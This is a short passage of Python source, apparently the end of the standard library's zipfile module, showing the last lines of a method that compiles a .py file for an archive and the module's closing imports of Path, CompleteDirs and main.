os.stat(file_py).st_mtime): 2203 | if not _compile(file_py, optimize=self._optimize): 2204 | fname = arcname = file_py 2205 | archivename = os.path.split(arcname)[1] 2206 | if basename: 2207 | archivename = "%s/%s" % (basename, archivename) 2208 | return (fname, archivename) 2209 | 2210 | 2211 | from ._path import 
( # noqa: E402 2212 | Path, 2213 | 2214 | # used privately for tests 2215 | CompleteDirs, # noqa: F401 2216 | ) 2217 | 2218 | # used privately for tests 2219 | from .__main__ import main # noqa: F401, E402 2220 | --------------------------------------------------------------------------------